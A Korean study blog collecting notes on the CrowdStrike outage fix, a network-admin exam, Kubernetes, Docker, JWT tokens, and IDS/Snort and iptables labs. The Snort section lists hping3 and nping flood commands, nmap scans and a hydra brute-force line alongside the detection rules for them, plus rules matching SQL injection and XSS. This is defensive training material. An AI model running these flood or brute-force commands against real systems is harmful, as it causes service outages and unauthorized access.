19일 오후부터 시작된 미국 사이버 보안 기업 ‘크라우드 스트라이크(CrowdStrike)’의 보안 소프트웨어의 업데이트 오류로 인해 항공, 은행, 방송 등 전 세계 시스템이 마비

발생 원인

• 크라우드 스트라이크의 보안 플랫폼 ‘팔콘(Falcon)’의 보안 업데이트 오류 → 기기들이 부팅 루프에 빠져 정상 작동 불가 - Falcon: 100% 클라우드 기반, 하드웨어나 추가 소프트웨어 등 구성요소 불필요, 호스트 방화벽 관리, 위협 인텔리전스 기능 함께 제공

이로 인한 문제점

해당 사고는 보안 또는 사이버 공격이 아니나 이를 악용한 사례 발생 가능 (기술 문제를 복구시켜 준다며 악성코드를 유포하고, 크라우드 스트라이크의 지원을 가장한 피싱 이메일을 통해 개인정보 입력을 유도한 사례가 발견)

긴급 조치 방법 (KISA)

• 안전 모드에서 문제가 되는 SW 파일을 삭제하는 것
  • 조치 순서: 먼저 안전 모드로 부팅 → 복구 화면에서 ‘고급 복구 옵션 보기’를 클릭 → 고급 복구 옵션 메뉴에서 ‘문제 해결’을 선택 → ‘고급 옵션’을 선택 → ‘시작 설정’을 선택하고 ‘다시 시작’을 클릭 → 재부팅 후 4 또는 F4 키를 눌러 안전 모드에서 PC를 시작
  • 두 번째로 안전 모드에서 명령 프롬프트(관리자) 또는 Windows PowerShell(관리자)를 실행한다. 다음으로 C:Windows-System32-drivers-CrowdStrike 디렉터리로 이동한 후, C-00000291*.sys 패턴과 일치하는 파일을 검색해 삭제

참고 기사

https://m.boannews.com/html/detail.html?idx=131501 https://m.boannews.com/html/detail.html?tab_type=1&idx=131506 https://www.dailysecu.com/news/articleView.html?idxno=157917 https://www.crowdstrike.com/statement-on-falcon-content-update-for-windows-hosts-kr/

1차 시험 및 기본 정보

1차 시험 및 기본 정보는 이전 게시글로 대체합니다. (과목, 시험일정 등)

시험

시험 장소는 일주일 전 홈페이지에 공개되고 수험표는 별도로 필요하지 않습니다. 랜툴의 경우 시험 장소에서 대여가 가능하다고 하였으나 상태가 안좋을 수도 있다는 공지를 보고 저는 개인적으로 챙겨갔습니다. 케이블 제작 - ICQA - 라우팅 순으로 시험이 진행됩니다. 각 시험 시작마다 비밀번호가 필요하며 감독관이 일정 시간이 지나면 알려주니 입력하시면 됩니다.

공부 방법

https://www.icqa.or.kr/cn/board/dataroom?sca=%EB%84%A4%ED%8A%B8%EC%9B%8C%ED%81%AC%EA%B4%80%EB%A6%AC%EC%82%AC

공식 사이트에서 올려준 연습 프로그램을 이용해서 실습을 진행했습니다. ICQA 문제 내용들은 대부분 하나하나 눌러가며 설명을 읽고 처리하면 충분히 풀 수 있으실겁니다. 해당 프로그램의 풀이 영상 링크입니다. https://www.youtube.com/watch?v=8LW96hLqXCo&list=PLrTFeWWAg1ciqrQ8hQ-42fotXi3AGz-aC&index=11

아래는 제가 여러 자료들을 취합해서 정리한 내용입니다.

합격 인증

개념

• 컨테이너화된 워크로드와 서비스를 관리하기 위한 이식성이 있고, 확장 가능한 오픈소스 플랫폼

• 선언적 구성과 자동화를 모두 용이하게 함

• 쿠버네티스 서비스, 기술 지원 및 도구는 어디서나 쉽게 이용가능

  기능

• 서비스 디스커버리와 로드 밸런싱

    - 쿠버네티스는 DNS 이름을 사용하거나 자체 IP 주소를 사용하여 컨테이너 노출 가능
    - 컨테이너에 대한 트래픽이 많으면, 쿠버네티스는 네트워크 트래픽을 로드밸런싱하고 배포하여 안정적 배포 가능

• 스토리지 오케스트레이션

    - 쿠버네티스 사용시 로컬 저장소, 공용 클라우드 공급자 등과 같이 원하는 저장소 시스템 자동 탑재

• 자동화된 롤아웃과 롤백

    - 쿠버네티스를 사용하여 배포된 컨테이너의 원하는 상태를 서술가능, 현재 상태를 원하는 상태로 설정한 속도에 따라 변경 가능
        → 쿠버네티스 자동화로 배포용 새 컨테이너 생성, 기존 컨테이너 제거, 모든 리소스를 새 컨테이너에 적용 가능 

• 자동화된 빈 패킹(bin packing)

    - 컨테이너화된 작업을 실행하는데 사용할 수 있는 쿠버네티스 클러스터 노드를 제공
    - 각 컨테이너가 필요로 하는 CPU와 메모리(RAM)를 쿠버네티스에게 지시
    - 쿠버네티스는 컨테이너를 노드에 맞추어서 리소스를 가장 잘 사용할 수 있도록 함

• 자동화된 복구(self-healing)

    - 실패한 컨테이너 재시작, 컨테이너 교체, '사용자 정의 상태 검사'에 응답하지 않는 컨테이너 죽임 → 서비스 준비가 끝날 때까지 과정 보여주지 않음

• 시크릿과 구성 관리

    - 쿠버네티스를 사용시 암호, OAuth 토큰 및 SSH 키와 같은 중요한 정보를 저장, 관리 가능
    - 컨테이너 이미지를 재구성하지 않고 스택 구성에 시크릿을 노출하지 않고도 시크릿 및 애플리케이션 구성을 배포 및 업데이트 가능

종류

• Flannel

    - 가장 단순한 쿠버네티스
    UDP나 VxLAN을 사용하여 가상 네트워크를 구성
    물리적인 네트워크 인프라 변경없이 쿠버네티스 클러스터를 구성할 때 사용
    신속함, 고도 확장 불가, 일부 환경 성능 문제 발생.

• Calico

    - 고성능 솔루션
    BGP 프로토콜을 사용(네트워크 라우팅)
    IP-in-IP, VXLAN, 또는 BGP 통해 가상 망 구성가능
    네트워크 정책 엔진을 제공
    대규모 환경 적합, 다중 클러스터 환경에도 사용.

• WeaveNet

    - 가벼우면서 유연한 쿠버네티스전용 네트워킹
    가상 네트워크구성가능
    UDP 또는 VXLAN 사용
    노드 간에 가상 네트워크를 자동으로 연결
    쿠버네티스 클러스터 설정이 간단
    다중 클러스터 환경에서도 사용
    네트워크 정책을 정의

설치(Calico)

도커 로그인 docker run -it ubuntu bash hostnamectl set-hostname k8s-master-00 ufw disable swapoff -a

• vi /etc/fstab
  스왑부분 주석

• vi /etc/containerd/config.toml 주석 cri

cat << EOF | tee /etc/docker/daemon.json { "exec-opts": ["native.cgroupdriver=systemd"], "log-driver": "json-file", "log-opts": { "max-size": "100m" }, "storage-driver": "overlay2" } EOF

cat << EOF | tee /etc/sysctl.d/sevas.conf net.bridge.bridge-nf-call-ip6tables = 1 net.bridge.bridge-nf-call-iptables = 1 EOF

cat << EOF | tee /etc/modules-load.d/sevas.conf overlay br_netfilter EOF

확인 lsmod | grep br_netfilter 설정로드 sysctl --system

• 레포지터리 설치

apt-get install -y apt-transport-https
curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.28/deb/Release.key | sudo gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.28/deb/ /' | sudo tee /etc/apt/sources.list.d/kubernetes.list apt-get update apt-get install -y kubelet kubeadm kubectl apt-mark hold kubelet kubeadm kubectl

docker login kubelet --version apt-get install nfs-kernel-server

systemctl daemon-reload systemctl enable docker systemctl enable kubelet systemctl enable containerd systemctl restart docker systemctl restart kubelet systemctl restart containerd systemctl status kubelet

containerd config default | tee /etc/containerd/config.toml sed -i 's/SystemdCgroup = false/SystemdCgroup = true/g' /etc/containerd/config.toml

service containerd restart service kubelet restart service NetworkManager restart nslookup google.com

마스터에서만 실행

kubeadm init --pod-network-cidr=192.168.0.0/16

• 메세지 → 해시 기록해둘 것

        Your Kubernetes control-plane has initialized successfully!
        To start using your cluster, you need to run the following as a regular user:
        mkdir -p $HOME/.kube
        sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
        sudo chown $(id -u):$(id -g) $HOME/.kube/config
        Alternatively, if you are the root user, you can run:
        export KUBECONFIG=/etc/kubernetes/admin.conf
        You should now deploy a pod network to the cluster.
        Run "kubectl apply -f [podnetwork].yaml" with one of the options listed at:
        https://kubernetes.io/docs/concepts/cluster-administration/addons/
        Then you can join any number of worker nodes by running the following on each as root:
        kubeadm join 192.168.10.100:6443 --token t74935.2sk3buhm764uwkbi \
        --discovery-token-ca-cert-hash sha256: 해시 출력

• vi /root/.bashrc export KUBECONFIG=/etc/kubernetes/admin.conf (추가)

bash set |grep KUBE

• calico 설치 (kubectl 쿠버네티스 명령어도구)

  kubectl create -f https://raw.githubusercontent.com/projectcalico/calico/v3.26.4/manifests/tigera-operator.yaml

        kubectl create -f https://raw.githubusercontent.com/projectcalico/calico/v3.26.4/manifests/custom-resources.yaml
        kubectl create -f https://raw.githubusercontent.com/projectcalico/calico/v3.27.2/manifests/tigera-operator.yaml
        kubectl create -f https://raw.githubusercontent.com/projectcalico/calico/v3.27.2/manifests/custom-resources.yaml

  칼리코 삭제할때는 find / -name calico 다 지우고 ipvsadm --clear / rm -rf /etc/cni/net.d 도 지움 확인 watch kubectl get pods -n calico-system

노드에서만 실행

mkdir -p $HOME/.kube scp 172.16.10.100:/etc/kubernetes/admin.conf $HOME/.kube/config cp -a $HOME/.kube/config /etc/kubernetes/admin.conf

• vi bashrc export KUBECONFIG=/etc/kubernetes/admin.conf

토큰

쿠버네티스에서 사용할 인증정보(secret) 를 생성 docker login cat /root/.docker/config.json

생성 kubectl create secret generic master --from-file=.dockerconfigjson=/root/.docker/config.json --type=kubernetes.io/dockerconfigjson 확인 kubeadm token list 접속 kubeadm join <192.168.0.10:6443> --token <Token 값> --discovery-token-ca-cert-hash sha256:<Hash 값>

토큰 사용 목적

1. 단일 토큰
   1. 로그인 성공 JWT 발급 서버 측 → 클라이언트로 JWT 발급
   2. 권한이 필요한 모든 요청 : 클라이언트 → 서버 측 JWT 전송 권한이 필요한 요청은 서비스에서 많이 발생 클라이언트 측 xxs나 http통신을 가로채서 토큰을 훔침 → 대비하기 위한 로직 필요
2. 다중 토큰 : refresh 토큰
   1. access/Refresh 토큰
   2. 생명주기를 짧게 발급 (약10분) , 토큰이 만료 되었을때 함께 받은 Refresh 토큰 (24시간) 토큰 재발급

       1. 로그인 성공시 2개 토큰
           - Access 토큰 : 권한이 필요한 모든 헤더에 사용될 JWT 생명주기를 짧게 함
           - Refresh 토큰 : 재발급을 위한 토큰으로 24시간 생명주기
       2. 권한이 필요한 모든요청은 Access 토큰을 사용
       3. Access 토큰이 만료될경우 Refresh 토큰을 검증 후 Access 토큰을 재발급

      포인트

3. 로그인이 완료되면 successHandler에서 Access/Refresh 토큰 2개 발급해 응답
4. Access 토큰을 요청을 검증하는 JWTFilter에서 Access 토큰이 만료된 경우 상태 코드와 메시지를 응답
5. 프론트 측 API 요청 시 Access 토큰 만료 요청이 오면 예외문을 통해 Refresh 토큰을 서버 측으로 전송 → Acccess 토큰을 새로 받는 로직 수행
6. 서버측에서는 토큰을 받을 엔드 포인트 구성 Refresh 검증 후 Access를 응답
   • 단일 → 다중으로 전환되면 Access 토큰이 탈취되더라도 생명 주기가 짧아 피해가 줄어듬 ⇒ Refresh 토큰에 대한 보호 방법이 필요
   • Refresh 토큰 Rotate 에 대한 부분 ( Access 토큰 갱신 시 Refresh 토큰도 재발급 )
     • Access/Refrsh 토큰 저장 위치
       • 기존 저장 로직
         • 로컬 스토리지 : xss 공격에 취약 : Access 토큰 저장
         • httpOnly 쿠키 : CSRF 공격에 취약 : Refresh 토큰 저장

           고려 사항

7. JWT의 탈취는 XSS 공격으로 로컬스토리지에 저장된 JWT를 가져감 쿠키방식은 CSRF공격에 취약하기 대문에 저장소가 중요
8. Access 토큰 보통 로컬 스토리지에 저장되고 짧은 생명주기
9. Refresh 토큰 주로 쿠키에 저장 httpOnly를 설정하면 방어 가능
10. Refresh 토큰은 Rotate를 통해서 Access 토큰 발급 시 Refresh토큰도 갱신하여 방어 조치를 함

가장 강력한 보안

• 로그아웃을 할 때 Access/Refresh 토큰을 초기화하고 제거함
• Refresh 토큰 블랙리스팅

리눅스의 응용 프로그램들을 프로세스 격리 기술들을 사용해 컨테이너로 실행하고 관리하는 오픈 소스 프로젝트

• container =emulator

명령어

• 포트 포워딩 상태로(백그라운드) 최초 실행 후 진입 docker run -d -p 80:80 --name sevas_web ID docker exec -it sevas_web /bin/bash

  • 최초 시작 전 반드시 로그인 docker login

  • 환경 확인 docker system info

  • 저장소 확인 docker system df

  • 최초 이미지 불러오기

    1. 도커 이미지 찾기

    -Docker search [이미지명] docker search oraclelinux

    2. 도커 이미지 가져오기

    -Docker pull [이미지명] [기본 latest] 웹에서 직접들어가서 tag까지 가져오기 - docker pull oraclelinux:8

    3. 도커 이미지 확인

    -Docker image ls

    4. 도커 이미지 삭제

    -Docker image rm [IMAGE_ID]

  • Container

    1. 실행 run, attach ,exec

       1. run : 새로운 컨테이너를 생성해 실행하는 명령어 (보통 최초한번만 실행-명령이 끝나면 종료)

          1. docker run --name [컨테이너 이름 지정] [Repository]:[TAG] → 포어그라운드= 웹페이지 접속x / ctrl +c만 가능

          • 명령어

            옵션 설명 -i --interactive 컨테이너의 표준 입력(stdin)을 활성화. (주로 -it 함께 사용) -t --tty tty (가상 터미널)을 할당, 리눅스에 키보드를 통해 표준 입력(stdin)을 전달할 수 있게한다. (주로 -it 함께 사용) --name 컨테이너 이름을 지정. -d --detach 컨테이너를 백그라운드로 실행. --rm docker run 명령어가 끝나면, 컨테이너 자동 삭제. -p --publish 호스트와 컨테이너의 포트를 연결 (포트포워딩). -p <호스트 포트>:<컨테이너 포트> ex) -p 80:8888 → 호스트에 8888로 접속하면, 컨테이너 내부의 80포트로 자동 접속. -v --volume 호스트와 컨테이너의 디렉토리 연결(마운트) -v <호스트 절대경로>:<컨테이너 절대경로> ex) -v /Users:/usr. → 컨테이너 /usr에 저장하는 파일은 호스트의 /Users 디렉토리에 저장. --restart 컨테이너 종료시, 재시작 정책 설정 --restart="always" 항상 재시작 --restart="on-failure" 종료 스테이터스가 0이 아닐 때 재시작

            --privileged 컨테이너 안에서 호스트의 리눅스 커널 기능을 모두 사용

            • --rm 옵션과 --restart 옵션은 동시 사용 x
            • 상태 Exited 비활성화 / UP 활성화

          • 실습

            확인: docker container ps -a

            docker run --name sevas_web nginx:latest → 포어그라운드 ctrl+p,ctrl+q 안됨 , ctrl+c (EXIT상태됨) docker run -it --name sevas2_web nginx:latest → 포어그라운드+가상터미널할당 ( -it ) ctrl+pq 로 나가서 유지

            docker run -d --name sevas3_web nginx:latest → 백그라운드실행 docker run -d --name sevas4_web -p 80:80 nginx:latest → 백그라운드실행 + DNAT설정 (웹페이지 출력됨)

       2. exec : 실행 중인 컨테이너에 명령어를 전달(외부 -> 내부)

          1. 진입해서 명령 실행 docker exec -it
          2. 명령만 실행 docker exec
          3. exec로 실행한 도커(Exited 상태) 실행 : docker start sevas_web uname -a

       3. attach : 실행 중인 컨테이너에 직접 들어가 명령어를 실행 (내부 접근) → 로그 내용 볼 때 사용, 잘 안씀

          1. docker attach docker attach sevas_web

             -it (접속유지)

          -d: 백그라운드

          연결 종료 후 나가기: ctrl +c 연결 유지한 채 나가기: ctrl +pq

    2. 확인

       1. 동작 중인 컨테이너: docker container ls
       2. 시작한 컨테이너: docker container ps -a
       3. 컨테이너 ID: docker container ps -a -q
    • 보통 최초 실행 시 run 사용 docker exec -it /bin/bash로 들어가서 작업

    1. 멈추기 docker stop [container ID] / 모두 멈추기 docker stop $(docker ps -a -q)

    2. 지우기 docker rm [container ID] / 모두 지우기 docker rm $(docker ps -a -q)

    3. 도커 내부에서 명령어 사용

       apt update apt install bet-tools apt install vim index 찾기 find / -name index.html -> /usr/share/ngnix/html

  • image

    • 호출 docker image ls
    • 저장 docker image save -o export.tar nginx:latest

         docker image save -o export.tar [IMAGE ID]

    • 로드 docker image load -i export.tar
    • 빌드 docker container commit -a "계정명" web_01 헤드:버전

         docker container commit -a "sevas2" web_01 web_01:1.0

    • 삭제 docker image rm [이름]

  • docker hub이용

    1. 회원가입
    2. create repositories
    3. docker image tag 이름:버전 계정/이름:버전 -> 태그 부여 ex) docker image tag sevas_web:1.0 sevas2/sevas_web:1.0
    4. docker push sevas2/sevas_web:1.0
    • repositories의 이름과 허브의 repositories이름이 같아야 함

1. 우분투 다운

https://ubuntu.com/ iso 바로 다운 링크

2. VM웨어 생성

(기본시작: custom/ 이미지에 없는 설정은 기본 설정) 최종

3. 우분투 설치

(이미지에 없는 설정은 기본 설정) 설치 완료 후 재시작 -> 생성한 계정으로 접속

4. 싱글부트

• 전원을 껐다가 킨 후 바로 ESC (아래 그림이 뜨기 전)

• 떠야하는 화면 -> e

• 해당 부분을 지운 후 rw init=/bin/bash로 변경 -> ctrl+x

• passwd 명령어를 통해 root 비밀번호 변경

• 3가지 파일 수정 (루트 로그인 허용) /저장명령어:wq

• 수정 완료 후 exec/sbin/init (재부팅)

• 재부팅 완료 후 목록에 없습니까? 누른 후 사용자이름 : root로 로그인

5. 네트워크 설정

6. 한글화

![] 추가로 한영버튼을 눌러서(Alt_R로 뜸)을 넣은 후, 이외에 것은 제거 - 적용 - 확인 - 이후 재부팅

• IDS (Intrusion Detection System) 침입 탐지 시스템
  • 시스템에 대한 원치 않은 조작을 탐지 → 내부 패킷을 주로 감지
  • 설치 위치와 목적에 따라 호스트 기반과 네트워크 기반의 침입 탐지 시스템으로 나뉨
  • 역할
    1. IPS를 우회하는 공격에 대한 탐지
    2. 내부 공격 및 보안 내용 탐지
    3. 제로데이 공격 유형 파악
    4. 오용 탐지
  • 장점
    • 해킹에 대한 좀 더 적극적인 보안대책
    • 내부 사용자의 오남용 탐지 및 방어 가능
    • 사고 발생시 근원지 및 사고 분석 가능
  • 단점
    • 대규모 네트워크에서는 사용이 어려움
    • 관리 및 운영이 어려움
    • 새로운 침입 기법에 즉각적인 차단 어려움
    • 보안 사고에 대한 근본적인 해결책은 되지 못함

1. 호스트 기반 ( HIDS : Host-based IDS )

• 컴퓨터 시스템의 내부를 감시하고 분석하는 데 중점을 둠
• 개인의 work station, server에 설치될 수 있으며, 컴퓨터 자체를 제한
• 운영체제에 설치된 사용자 계정에 따라 어떤 사용자가 어떠한 접근을 시도하고 작업을 했는지에 대한 기록을 남기고 추적
• 네트워크에 대한 침입 탐지는 불가능하며, 스스로가 공격 대상이 될 때만 침입을 탐지하는 방식
• 트로이 목마, 논리 폭탄, 백도어 탐지
• ex) Tripwire

  1-1. Tripwire

• tripwire 무결성 점검도구 -> 기존 데이터와 비교하여 변조된 내용 확인(모니터링 도구)
• 설치 yum install epel* yum install tripwire

-키세팅 tripwire-setup-keyfiles <<<<<<<<<엔터엔터엔터 cat /etc/tripwire/twcfg.txt -> 키세팅 파일 생성

cd /etc/tripwire cp twpol.txt twpol.txt.bak

vi twpol.txt

/bin -> $(ReadOnly); /etc -> $(IgnoreNone)-SHa; /var -> +pug; /dev -> +pug; /back -> +pug;

p 퍼미션 u uid g gid

• 정책적용 twadmin --create-polfile twpol.txt

• 구동 tripwire --init

• 확인 tripwire --check useradd korea passwd [비번설정] cp /backup/ping /usr/bin/ping

2. 네트워크 기반 ( NIDS : Network-based IDS )

• 네트워크를 통해 전송되는 패킷 정보 수집 및 분석하여 침입을 탐지하는 시스템
• 감지기를 사용하며, 무차별모드(Promiscuos mode)에서 동작하는 네트워크 인터페이스에 설치되어있음
• IP 주소를 소유하지 않아 직접적인 해커 공격은 거의 완벽하게 방어 가능
• 설치 위치에 따라 감시 대상 네트워크 범위 조절 가능, 별도 서버를 스위치에 연결
• 공격 당한 시스템의 공격에 대한 결과는 알 수 없으며, 암호화된 내용 탐지 불가 ex) Snort

2-1. Snort

• 무료 오픈 소스 네트워크 침입 탐지 시스템이자, 침입 방지 시스템으로 실시간으로 트래픽 분석 및 패킷을 기록 ( IDS & IPS )

• 와이어샤크+ 필터

  • 패킷 스니퍼 모드

    • Tcpdump와 같은 네트워크의 TCP/IP 패킷을 읽어 보여주는 기능

  • 패킷 로거 모드

    • 모니터링한 패킷을 저장하고 로그를 기록하는 기능
    • 트래픽 디버깅에 매우 유용하게 사용

  • 네트워크 IDS 모드

    • 네트워크 트래픽(패킷) 분석 및 공격 탐지 기능을 제공

  • Snort Inline

    • 침입방지시스템으로, 패킷 분석, 공격 차단 기능을 제공

  • nc → 메세지 주고 받는 창 (간단한 실습)

    nc -l 8080

    nc 10.10.10.10 8080

  • 시작 snort -i ens33 -c local 혹은 데몬 실행

  ---

  • snort 정책

      alert icmp  any any <> 10.10.10.10 any (msg:"ICMP PING";sid:50001;)
      alert tcp any any -> 10.10.10.10 80 (msg:"SEVAS_HTTP";sid:50002;)

    [action] [protocol] [src_ip] [src_port] -> [Dst_ip] [Dst_port] [option]

    액션 action : alert , pass ,drop , reject ,log 프로토콜 protocol : TCP,UDP , IP , ICMP 출발지 IP Src_ip : any , 10.10.10.10 , 10.10.10.0/24 ! 출발지 port src_port : any , 22, 80 ,...... ! , : (1:1000) 패킷 흐름 방향 : -> , <> 도착지 IP Dst_ip : any , 10.10.10.10 , 10.10.10.0/24 도착지 port Dst_port : any , 22, 80 ,...... 침입 탐지 옵션 option : msg ,content ,flow , rev......

    • src → 공격자의 출발지를 ip 추적하고 싶을때 유용

    • dst → (여러 ip로 부터)공격 받고 있는 대상 서버나 네트워크를 보호하고자 할 때 유용

      rev : 규칙 수정버전 classtype : 유형별 정의 priority : 우선순위 reference : url로 정책 정의

    • 옵션 ( <> 양방향 | -> 단방향 <- ) → 오탐 (IPS에서 중요), 미탐 방지 (IDS에서 중요)

      • content 글자를 잡아낸다 ex) content:"sevas"; → 16진수의 경우 “| |” 로 감싸야함
      • msg 메세지 내용 출력 ex) msg:"메롱";
      • nocase 대소문자를 구분하지 않는다 ex) nocase;
      • sid 규칙 식별자(정책 순서 지정) ex) dis:50005;
      • offset 매칭 시작 문자열 위치 0으로 설정 시 1부터 검색
      • depth 문자열 범위를 지정 0으로 설정 시 1부터 검색
      • distance 옵션 값 이후 탐색 위치 지정 (이후) ex) content:”abc”; content:”test”; distance: 10;
      • within 옵션 값 이후 탐색 범위 지정 (이내) (distance, offset, depth)
        • abc | within (이내) 10 (이후) distance |
      • pcre 문자열 (URL 검사)
        • 정책 예시
          • depth , offset → 123문자가 들어간 내용이 4바이트 이후부터 7바이트안에 존재하는지 알림 alert tcp 20.20.20.20 any -> 10.10.10.10 8080 (msg:"depth_TEST"; content:"123";offset:4; depth:7; sid:50008;)
          • distance alert tcp 20.20.20.20 any -> 10.10.10.10 8080 (msg:"distance_TEST"; content:"abc"; content:"test"; distance:10; sid:50009;)
          • within alert tcp 20.20.20.20 any -> 10.10.10.10 8080 (msg:"within_TEST"; content:"abc"; content:"test"; within:10; sid:50009;)
          • pcre alert tcp 10.10.10.0/24 any -> any 443 (msg:"SNS_ACCESS"; pcre:"/facebook.com|instargram.com/"; sid:50010;)
          • telnet → 문구가 다르게 나오는 것을 와이어샤크로 확인 후 content로 작성 alert tcp 10.10.10.10 23 -> any any (msg:"Telnet OK"; content:"|6c617374206c6f67696e|"; nocase; sid:50007;) alert tcp 10.10.10.10 23 -> any any (msg:"Telnet Fail"; content:"|4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 63 74|"; nocase; sid:50006;)
          • ICMP 20 →10 으로 ping alert icmp 20.20.20.20 any -> 10.10.10.10 any (msg:"REQUEST_ICMP"; itype:8; sid:50011;) alert icmp 10.10.10.10 any -> 20.20.20.20 any (msg:"REPLY_ICMP"; itype:0; sid:50012;)
          • threshold (5개마다 탐지) alert icmp any any -> 10.10.10.10 any (msg:”THRESHOLD”; threshold: type threshold, track by_src, count 5, seconds 10; sid: 50013;)
          • limit (5개까지 탐지) alert icmp any any -> 10.10.10.10 any (msg:”limit”; threshold: type limit , track by_src, count 5, seconds 10; sid: 50013;)
          • both (1개만 탐지) alert icmp any any -> 10.10.10.10 any (msg:”limit”; threshold: type limit , track by_src, count 5, seconds 10; sid: 50013;)

• http에서 <script> 잡아내기 alert tcp any any -> 10.10.10.10 80 (msg:"XSS_ATTACK(http)"; content:"|253343736372697074253345|"; nocase; sid:50005;)

• 간격 DOS&NMAP 탐지

  • threshold (이벤트 탐지 옵션) ex) threshold: type threshold, track by_src…

          - type threshold : 발생하는 이벤트 수마다 탐지
          - type limit        : 시간 동안 발생하는 이벤트 수까지 탐지
          - **type both**        : 시간 동안 발생하는 이벤트 수 중 1번만 탐지
              - track by_src   : 출발지 기준
              - track by_dst   : 목적지 기준
              - count            : 횟수
              - seconds        : 시간
              - itype             : 0 = reply   8 =request

• TCP Flags → 4 계층

  SYN 연결 ACK 응답 RST 재시작 (강제 종료) FIN 종료 URG 긴급 → 순위 상승 PSH 우선순위 → 순위 상승 NULL flag X

  flags : S R A P U F fragsbits: R D M ( R:예약 D:분할X M:분할 ) sameip : 출발지와 도착지 IP가 같을 경우 탐지

• 공격 탐지

        1. ping of death 탐지 [ 단편화가 되고 파일이 일정시간 이상 들어올때 차단 ] ( hping3 --icmp -d 40000 10.10.10.10 --flood)     (프로토콜이 IPv4이기에 IP O, ICMP X)
            `alert  ip any any -> 10.10.10.10 any (msg:"PING_OF_DEATH";threshold:type both,track by_src,count 50, seconds 10; fragbits:M;sid:50012;)`

2. Land attack [출발지와 도착지 IP가 같은 경우 탐지 ] ( hping3 --icmp -a 10.10.10.10 10.10.10.10 --flood )

            1. 사전 설정(보안해제) : cd /proc/sys/net/ipv4/conf
            2. echo “0” > all/rp_filter
            3. `alert icmp any any -> 10.10.10.10 any (sid:50013; msg:"LAND attack";sameip;threshold:type both,track by_src,count 20,seconds 10;)`

   3. smuf_attack [hping3 -1 -a 30.30.30.30 10.10.10.255 --flood ) = 라우터에서 ip direct broadcast / 리눅스에서 /proc/sys/net/ipv4/icmp_echo_ignore_boradcast]

            `alert icmp any any -> 255.255.255.255 any (msg:"Smuf attack";itype:8; threshold type both,track by_dst,count 20,seconds 10; sid 50014;)`

3. TCP_SYN_FLOODING

        `alert tcp  any any -> 10.10.10.10 80 (sid:50015; msg:"TCP_SYN_FLOODING"; flags:S; threshold:type both,track by_dst,count 20,seconds 10;)`
        hping3 --rand-source 10.10.10.10 -p 80 -S --flood

   5. TCP_Connect_FLOODING alert tcp any any -> 10.10.10.10 80 (sid:50016; msg:"TCP_Connect_FLOODING"; flags:A; threshold:type both,track by_src,count 20,seconds 10;)

        nping --tcp-connect -p 80 -rate=90000 -c 90000 -q 10.10.10.10

4. UDP_FOODING

        `alert udp  !10.10.10.10 any -> 10.10.10.10 any (sid:50017; msg:"UDP_FLOODING"; threshold:type both,track by_src,count 20,seconds 10;)`
        hping3 -2 10.10.10.10 --flood

• 웹 공격
  • 웹공격 IDS: 웹은 대부분 시그니처 공격으로 되기때문에 pcre , content 를 사용해서 필터링을 함
  • 웹사이트 SNS 접속 확인

          `alert tcp 10.10.10.10 any -> any 443 (msg:"SNS_ACCESS";pcre:"/facebook.com|[instagram.com/](http://instagram.com/)"; sid:50040;)`

    • SQL_injection 확인 - 게시판 board_view.php 기준 alert tcp any any -> 10.10.10.10 80 (msg:"sql_injection";pcre:"/UNION|SELECT|OR|%27|%23/i";content:"board_view.php"; sid:50041;)
  • xxs 확인

      `alert tcp any any -> 10.10.10.10 80 (msg:"xss_attack";content:"script";nocase; sid:50042;)`

• 스캔 관련 룰

        1. X-MAS → nmap -sX 10.10.10.10
        `alert tcp !10.10.10.10 any -> 10.10.10.10 any (msg:"X-MAS SCAN -sX";flags:UPF; threshold:type both,track by_src,count 20,seconds 10; sid:50020;)`
        2. FIN SCAN → nmap -sF 10.10.10.10
        `alert tcp !10.10.10.10 any -> 10.10.10.10 any (msg:"FIN SCAN -sF";flags:F; threshold:type both,track by_src,count 20,seconds 10; sid:50021;)`
        3. SYN SCAN → nmap -sS 10.10.10.10
        `alert tcp !10.10.10.10 any -> 10.10.10.10 any (msg:"SYN SCAN -sS"; flags:S; threshold:type both,track by_src,count 20,seconds 10; sid:50022;)`
        4. NULL SCAN → nmap -sN 10.10.10.10
        `alert tcp !10.10.10.10 any -> 10.10.10.10 any (msg:"NULL SCAN -sN"; flags:0; threshold:type both,track by_src,count 20,seconds 10; sid:50023;)`
    - ssh 에 hydra 로 brute force 공격을 차단하는 정책
    `alert tcp any any -> 10.10.10.10 22(sid:50050; msg:"SSH_Brute Force"; threshold:type both,track by_src,count 10,seconds 10; flags:S;)`
        hydra -l sevas -x 1:1:1a! ftp://192.168.1.10 -V

16진수 변환 사이트: https://www.hextotext.com/kr/convert-hex-to-text 0

• IPS: 탐지, 차단은 선택/IDS: 탐지 중점, 차단 가능은 함

  • 방화벽: 3,4 혹은 7계층까지 가능. but 특화된 것도 없어서 전문적 차단은 어려움 그래서 IPS 사용

• 기본 개념

  • 기능

    1. 패킷필터링 ( netfilter )
    2. 로그기능 ( logging )
    3. NAT ( SNAT/DNAT=포트포워딩 )
    4. 확장 기능 (다양한 모듈 = mangle )

  • INPUT : 도착지가 IPTABLE인 패킷 - 10 -> IPTABLE

  • OUTPUT : 출발지가 IPTABLE인 패킷 - IPTABLE -> 10

  • FORWARD : 경유지(via)가 IPTABLE인 패킷 - 10 ->20

  • INPUT, FORWARD, OUTPUT 셋 다 별개의 정책이자 개념

    • iptable 입장에서는 서버는 나에게 주는 놈(IN), 클라이언트는 내가 줘야하는 놈(OUT)
    • 밖에서 안으로 들어오는 건 IN, 내부를 통해서 나가는 건 OUT으로 잡아야 함 / 내부는 자유롭게 돌아다니기에..

  • IPTABLES 적용 순서: 먼저 적용된 것이 무조건 우선

  • 생각을 할 때 ip 기준에서 x, iptable 입장에서 고려

  • 정책은 반드시 하나는 거쳐야 함, 아닐 시 drop

• 기본 정책

  :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0]

  • ACCEPT : 허가 → 디폴트
  • REJECT : 반송
  • DROP : 폐기 → 주로 쓰임
  • LOG : 로그기록
  • RETURN : 룰 연계

• iptables 룰

  • -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT

    • 내부로 접근하는 tcp 중 (- A INPUT -p tcp )
    • 새로운 연결을 요청하는 (-m state --state NEW )
